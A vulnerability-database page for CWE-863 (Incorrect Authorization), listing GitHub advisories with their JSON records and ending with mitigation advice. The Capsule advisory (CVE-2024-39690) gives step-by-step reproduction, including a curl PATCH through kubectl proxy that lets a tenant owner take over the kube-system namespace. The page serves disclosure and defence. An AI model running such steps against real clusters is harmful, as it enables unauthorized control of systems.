Common Weakness Enumeration

CWE-863

Allowed-with-Review

Incorrect Authorization

Abstraction: Class · Status: Incomplete

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

5537 vulnerabilities reference this CWE, most recent first.

GHSA-MQ69-4J5W-3QWP

Vulnerability from github – Published: 2024-08-20 18:34 – Updated: 2025-08-14 13:32
VLAI
Summary
Capsule tenant owner with "patch namespace" permission can hijack system namespaces
Details

Attack Vector

Then, let me briefly explain the reasons for the errors mentioned above: 1. The 'kubectl edit' command was used to patch the namespace, but this operation requires both 'get' and 'patch' permissions, hence the error. One should use methods like 'curl' to directly send a PATCH request; 2. The webhook does not intercept patch operations on 'kube-system' because 'kube-system' does not have an ownerReference.

Below are my detailed reproduction steps

  1. Create a test cluster kind create cluster --image=kindest/node:v1.24.15 --name=k8s
  2. Install the capsule helm install capsule projectcapsule/capsule -n capsule-system --create-namespace
  3. Create a tenant
kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: tenant1
spec:
  owners:
  - name: alice
    kind: User
EOF
  1. Create user alice
./create-user.sh alice tenant1 capsule.clastix.io
export KUBECONFIG=alice-tenant1.kubeconfig
  1. Patch kube-system (The first command is executed in the current shell, while the 2nd and 3rd commands require a different shell window because the current shell is being used as a proxy.)
kubectl proxy

export DATA='[{"op": "add", "path": "/metadata/ownerReferences", "value":[{"apiVersion": "capsule.clastix.io/v1beta2", "blockOwnerDeletion": true, "controller": true, "kind": "Tenant", "name": "tenant1", "uid": "ce3f2296-4aaa-45b0-a8fe-879d5096f193"}]}]'

curl http://localhost:8001/api/v1/namespaces/kube-system/ -X PATCH -d "$DATA" -H "Content-Type: application/json-patch+json"
  1. Check the result The kube-system is patched successfully. image

Summary

The tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace.

I would like to express my apologies once again. I have always been sincere in my research and communication, and I did not intend to disturb you on purpose.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.7.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/projectcapsule/capsule"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-39690"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-20T18:34:37Z",
    "nvd_published_at": "2024-08-20T15:15:21Z",
    "severity": "HIGH"
  },
  "details": "# Attack Vector\nThen, let me briefly explain the reasons for the errors mentioned above: 1. The \u0027kubectl edit\u0027 command was used to patch the namespace, but this operation requires both \u0027get\u0027 and \u0027patch\u0027 permissions, hence the error. One should use methods like \u0027curl\u0027 to directly send a PATCH request; 2. The webhook does not intercept patch operations on \u0027kube-system\u0027 because \u0027kube-system\u0027 does not have an ownerReference.\n\n# Below are my detailed reproduction steps\n1. Create a test cluster\n`kind create cluster --image=kindest/node:v1.24.15 --name=k8s`\n2. Install the capsule\n`helm install capsule projectcapsule/capsule -n capsule-system --create-namespace`\n3. Create a tenant\n```\nkubectl create -f - \u003c\u003c EOF\napiVersion: capsule.clastix.io/v1beta2\nkind: Tenant\nmetadata:\n  name: tenant1\nspec:\n  owners:\n  - name: alice\n    kind: User\nEOF\n```\n4. Create user alice\n```\n./create-user.sh alice tenant1 capsule.clastix.io\nexport KUBECONFIG=alice-tenant1.kubeconfig\n```\n5. Patch kube-system (The first command is executed in the current shell, while the 2nd and 3rd commands require a different shell window because the current shell is being used as a proxy.)\n```\nkubectl proxy\n\nexport DATA=\u0027[{\"op\": \"add\", \"path\": \"/metadata/ownerReferences\", \"value\":[{\"apiVersion\": \"capsule.clastix.io/v1beta2\", \"blockOwnerDeletion\": true, \"controller\": true, \"kind\": \"Tenant\", \"name\": \"tenant1\", \"uid\": \"ce3f2296-4aaa-45b0-a8fe-879d5096f193\"}]}]\u0027\n\ncurl http://localhost:8001/api/v1/namespaces/kube-system/ -X PATCH -d \"$DATA\" -H \"Content-Type: application/json-patch+json\"\n```\n7. Check the result\nThe kube-system is patched successfully.\n![image](https://github.com/projectcapsule/capsule/assets/151004196/e2775304-c1f4-494d-ab15-14f6f33e29ec)\n\n\n# Summary\nThe tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace.\n\nI would like to express my apologies once again. I have always been sincere in my research and communication, and I did not intend to disturb you on purpose.",
  "id": "GHSA-mq69-4j5w-3qwp",
  "modified": "2025-08-14T13:32:09Z",
  "published": "2024-08-20T18:34:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-mq69-4j5w-3qwp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39690"
    },
    {
      "type": "WEB",
      "url": "https://github.com/projectcapsule/capsule/commit/d620b0457ddec01616b8eab8512a10611611f584"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/projectcapsule/capsule"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Capsule tenant owner with \"patch namespace\" permission can hijack system namespaces"
}

GHSA-MQ75-P9MG-FJ7F

Vulnerability from github – Published: 2024-10-15 21:30 – Updated: 2024-10-15 21:30
VLAI
Details

Vulnerability in the Oracle Cost Management product of Oracle E-Business Suite (component: Cost Planning). Supported versions that are affected are 12.2.12-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Cost Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Cost Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Cost Management accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-21267"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-15T20:15:18Z",
    "severity": "HIGH"
  },
  "details": "Vulnerability in the Oracle Cost Management product of Oracle E-Business Suite (component: Cost Planning).  Supported versions that are affected are 12.2.12-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Cost Management.  Successful attacks of this vulnerability can result in  unauthorized creation, deletion or modification access to critical data or all Oracle Cost Management accessible data as well as  unauthorized access to critical data or complete access to all Oracle Cost Management accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).",
  "id": "GHSA-mq75-p9mg-fj7f",
  "modified": "2024-10-15T21:30:39Z",
  "published": "2024-10-15T21:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21267"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2024.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MQCJ-8C2G-H97Q

Vulnerability from github – Published: 2025-11-13 18:31 – Updated: 2025-11-14 15:54
VLAI
Summary
Mattermost Incorrect Authorization vulnerability
Details

Mattermost versions 10.11.x <= 10.11.3, 10.5.x <= 10.5.11 fail to properly validate team membership permissions in the Add Channel Member API, which allows users from one team to access user metadata and channel membership information from other teams via the API endpoint.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.11.0"
            },
            {
              "fixed": "10.11.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.5.0"
            },
            {
              "fixed": "10.5.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost/server/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.0.0-20250905150616-ba86dfc5876b"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.3.2-0.20250905150616-ba86dfc5876b"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.3.2-0.20250905150616-ba86dfc5876b"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server/v5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.3.2-0.20250905150616-ba86dfc5876b"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server/v6"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.3.2-0.20250905150616-ba86dfc5876b"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-11777"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-14T15:54:50Z",
    "nvd_published_at": "2025-11-13T18:15:49Z",
    "severity": "LOW"
  },
  "details": "Mattermost versions 10.11.x \u003c= 10.11.3, 10.5.x \u003c= 10.5.11 fail to properly validate team membership permissions in the Add Channel Member API, which allows users from one team to access user metadata and channel membership information from other teams via the API endpoint.",
  "id": "GHSA-mqcj-8c2g-h97q",
  "modified": "2025-11-14T15:54:51Z",
  "published": "2025-11-13T18:31:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11777"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mattermost/mattermost/commit/98acefe911dd9de7edf47a7d825dd99f53141a52"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mattermost/mattermost/commit/ba86dfc5876b354b9d3c20ff45c08ca6f8426149"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mattermost/mattermost/commit/d72d437f1567ba0b639b6e4fd73bab06c51baab5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mattermost/mattermost"
    },
    {
      "type": "WEB",
      "url": "https://mattermost.com/security-updates"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mattermost Incorrect Authorization vulnerability"
}

GHSA-MQM2-JJX4-44GX

Vulnerability from github – Published: 2026-06-04 15:30 – Updated: 2026-06-08 15:32
VLAI
Details

A logic error in the MISP CRUD component delete handler allowed validation failures to be bypassed when requests used the HTTP DELETE method. Due to missing parentheses in the delete condition, the expression was evaluated as ($validationError === null && POST) || DELETE, meaning a DELETE request could proceed even when the delete validation callback had rejected the operation. An authenticated attacker with access to an affected delete endpoint could abuse this flaw to delete records that should have been protected by application-level validation or authorization checks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-10860"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-04T15:16:49Z",
    "severity": "HIGH"
  },
  "details": "A logic error in the MISP CRUD component delete handler allowed validation failures to be bypassed when requests used the HTTP DELETE method. Due to missing parentheses in the delete condition, the expression was evaluated as ($validationError === null \u0026\u0026 POST) || DELETE, meaning a DELETE request could proceed even when the delete validation callback had rejected the operation. An authenticated attacker with access to an affected delete endpoint could abuse this flaw to delete records that should have been protected by application-level validation or authorization checks.",
  "id": "GHSA-mqm2-jjx4-44gx",
  "modified": "2026-06-08T15:32:42Z",
  "published": "2026-06-04T15:30:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10860"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MISP/MISP/commit/a5877559dc88ad7a0c935910a652c130489ae2bd"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-MQMQ-69C9-VM4C

Vulnerability from github – Published: 2022-05-02 03:32 – Updated: 2024-01-09 03:30
VLAI
Details

The default configuration of the Security global settings on the Citrix NetScaler Access Gateway appliance with Enterprise Edition firmware 9.0, 8.1, and earlier specifies Allow for the Default Authorization Action option, which might allow remote authenticated users to bypass intended access restrictions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2009-2213"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2009-06-25T23:14:00Z",
    "severity": "MODERATE"
  },
  "details": "The default configuration of the Security global settings on the Citrix NetScaler Access Gateway appliance with Enterprise Edition firmware 9.0, 8.1, and earlier specifies Allow for the Default Authorization Action option, which might allow remote authenticated users to bypass intended access restrictions.",
  "id": "GHSA-mqmq-69c9-vm4c",
  "modified": "2024-01-09T03:30:19Z",
  "published": "2022-05-02T03:32:59Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2213"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/51274"
    },
    {
      "type": "WEB",
      "url": "http://support.citrix.com/article/CTX118770"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/35422"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2009/1641"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MQPW-46FH-299H

Vulnerability from github – Published: 2026-02-17 21:39 – Updated: 2026-03-06 01:02
VLAI
Summary
OpenClaw authorization bypass: operator.write can resolve exec approvals via chat.send -> /approve
Details

Summary

What this means (plain language)

If you give a client “chat/write” access to the gateway (operator.write) but you do not intend to let that client approve exec requests (operator.approvals), affected versions could still let that client approve/deny a pending exec approval by sending the /approve chat command.

This is mainly relevant for shared or multi-client setups where different tokens are intentionally scoped differently. Single-operator installs are typically less impacted.

Technical summary

A gateway client authenticated with a device token scoped only to operator.write (without operator.approvals) could approve/deny pending exec approval requests by sending a chat message containing the built-in /approve command.

exec.approval.resolve is correctly scoped to operator.approvals for direct RPC calls, but the /approve command path invoked it via an internal privileged gateway client.

Affected Packages / Versions

  • openclaw (npm): < 2026.2.2

Fix

  • Fixed in openclaw 2026.2.2.
  • Fix commit(s): efe2a464afcff55bb5a95b959e6bd9ec0fef086e.
  • Change: when /approve is invoked from gateway clients (webchat/internal channel), it now requires the requesting client to have operator.approvals (or operator.admin).

Workarounds

  • Upgrade to openclaw >= 2026.2.2.
  • If you cannot upgrade: avoid issuing write-only device tokens to untrusted clients; disable text commands (commands.text=false) or restrict access to the webchat/control UI.

References

  • Fix: src/auto-reply/reply/commands-approve.ts
  • Coverage: src/auto-reply/reply/commands-approve.test.ts

Release Process Note

This advisory is kept in draft; once the fixed npm versions are available, it can be published without further edits.

Thanks @yueyueL for reporting.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28473"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-17T21:39:11Z",
    "nvd_published_at": "2026-03-05T22:16:21Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\n### What this means (plain language)\n\nIf you give a client \u201cchat/write\u201d access to the gateway (`operator.write`) but you do not intend to let that client approve exec requests (`operator.approvals`), affected versions could still let that client approve/deny a pending exec approval by sending the `/approve` chat command.\n\nThis is mainly relevant for shared or multi-client setups where different tokens are intentionally scoped differently. Single-operator installs are typically less impacted.\n\n### Technical summary\n\nA gateway client authenticated with a device token scoped only to `operator.write` (without `operator.approvals`) could approve/deny pending exec approval requests by sending a chat message containing the built-in `/approve` command.\n\n`exec.approval.resolve` is correctly scoped to `operator.approvals` for direct RPC calls, but the `/approve` command path invoked it via an internal privileged gateway client.\n\n## Affected Packages / Versions\n\n- `openclaw` (npm): `\u003c 2026.2.2`\n\n## Fix\n\n- Fixed in `openclaw` `2026.2.2`.\n- Fix commit(s): `efe2a464afcff55bb5a95b959e6bd9ec0fef086e`.\n- Change: when `/approve` is invoked from gateway clients (webchat/internal channel), it now requires the requesting client to have `operator.approvals` (or `operator.admin`).\n\n## Workarounds\n\n- Upgrade to `openclaw \u003e= 2026.2.2`.\n- If you cannot upgrade: avoid issuing write-only device tokens to untrusted clients; disable text commands (`commands.text=false`) or restrict access to the webchat/control UI.\n\n## References\n\n- Fix: `src/auto-reply/reply/commands-approve.ts`\n- Coverage: `src/auto-reply/reply/commands-approve.test.ts`\n\n## Release Process Note\n\nThis advisory is kept in draft; once the fixed npm versions are available, it can be published without further edits.\n\nThanks @yueyueL for reporting.",
  "id": "GHSA-mqpw-46fh-299h",
  "modified": "2026-03-06T01:02:19Z",
  "published": "2026-02-17T21:39:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mqpw-46fh-299h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28473"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/efe2a464afcff55bb5a95b959e6bd9ec0fef086e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-approve-chat-command"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw authorization bypass: operator.write can resolve exec approvals via chat.send -\u003e /approve"
}

GHSA-MQQ4-VJGX-22JJ

Vulnerability from github – Published: 2021-12-14 00:00 – Updated: 2022-07-13 00:01
VLAI
Details

IBM Spectrum Copy Data Management 2.2.13 and earlier could allow a remote attacker to access the Spring Boot console without authorization. IBM X-Force ID: 214523.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-39052"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-13T18:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "IBM Spectrum Copy Data Management 2.2.13 and earlier could allow a remote attacker to access the Spring Boot console without authorization. IBM X-Force ID: 214523.",
  "id": "GHSA-mqq4-vjgx-22jj",
  "modified": "2022-07-13T00:01:36Z",
  "published": "2021-12-14T00:00:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39052"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/214523"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/6525554"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MQX9-J68H-8466

Vulnerability from github – Published: 2022-05-24 19:19 – Updated: 2022-05-24 19:19
VLAI
Details

The Stylish Price List WordPress plugin before 6.9.1 does not perform capability checks in its spl_upload_ser_img AJAX action (available to authenticated users), which could allow any authenticated users, such as subscriber, to upload arbitrary images.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-24770"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-11-01T09:15:00Z",
    "severity": "MODERATE"
  },
  "details": "The Stylish Price List WordPress plugin before 6.9.1 does not perform capability checks in its spl_upload_ser_img AJAX action (available to authenticated users), which could allow any authenticated users, such as subscriber, to upload arbitrary images.",
  "id": "GHSA-mqx9-j68h-8466",
  "modified": "2022-05-24T19:19:19Z",
  "published": "2022-05-24T19:19:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-24770"
    },
    {
      "type": "WEB",
      "url": "https://wpscan.com/vulnerability/4365c813-4bd7-4c7c-a15b-ef9a42d32b26"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-MR2C-PV2Q-GWVR

Vulnerability from github – Published: 2022-05-24 17:46 – Updated: 2022-07-13 00:01
VLAI
Details

TerraMaster F2-210 devices through 2021-04-03 use UPnP to make the admin web server accessible over the Internet on TCP port 8181, which is arguably inconsistent with the "It is only available on the local network" documentation. NOTE: manually editing /etc/upnp.json provides a partial but undocumented workaround.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-30127"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-04-03T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "TerraMaster F2-210 devices through 2021-04-03 use UPnP to make the admin web server accessible over the Internet on TCP port 8181, which is arguably inconsistent with the \"It is only available on the local network\" documentation. NOTE: manually editing /etc/upnp.json provides a partial but undocumented workaround.",
  "id": "GHSA-mr2c-pv2q-gwvr",
  "modified": "2022-07-13T00:01:18Z",
  "published": "2022-05-24T17:46:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30127"
    },
    {
      "type": "WEB",
      "url": "https://kn100.me/terramaster-nas-exposing-itself-over-upnp"
    },
    {
      "type": "WEB",
      "url": "https://news.ycombinator.com/item?id=26681984"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MR45-MWHC-FW72

Vulnerability from github – Published: 2022-05-13 01:23 – Updated: 2022-05-13 01:23
VLAI
Details

It was discovered that PostgreSQL versions before 10.5, 9.6.10, 9.5.14, 9.4.19, and 9.3.24 failed to properly check authorization on certain statements involved with "INSERT ... ON CONFLICT DO UPDATE". An attacker with "CREATE TABLE" privileges could exploit this to read arbitrary bytes server memory. If the attacker also had certain "INSERT" and limited "UPDATE" privileges to a particular table, they could exploit this to update other columns in the same table.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-10925"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-08-09T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "It was discovered that PostgreSQL versions before 10.5, 9.6.10, 9.5.14, 9.4.19, and 9.3.24 failed to properly check authorization on certain statements involved with \"INSERT ... ON CONFLICT DO UPDATE\". An attacker with \"CREATE TABLE\" privileges could exploit this to read arbitrary bytes server memory. If the attacker also had certain \"INSERT\" and limited \"UPDATE\" privileges to a particular table, they could exploit this to update other columns in the same table.",
  "id": "GHSA-mr45-mwhc-fw72",
  "modified": "2022-05-13T01:23:19Z",
  "published": "2022-05-13T01:23:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10925"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2511"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2565"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2566"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:3816"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10925"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201810-08"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3744-1"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2018/dsa-4269"
    },
    {
      "type": "WEB",
      "url": "https://www.postgresql.org/about/news/1878"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-08/msg00043.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/105052"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1041446"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

No CAPEC attack patterns related to this CWE.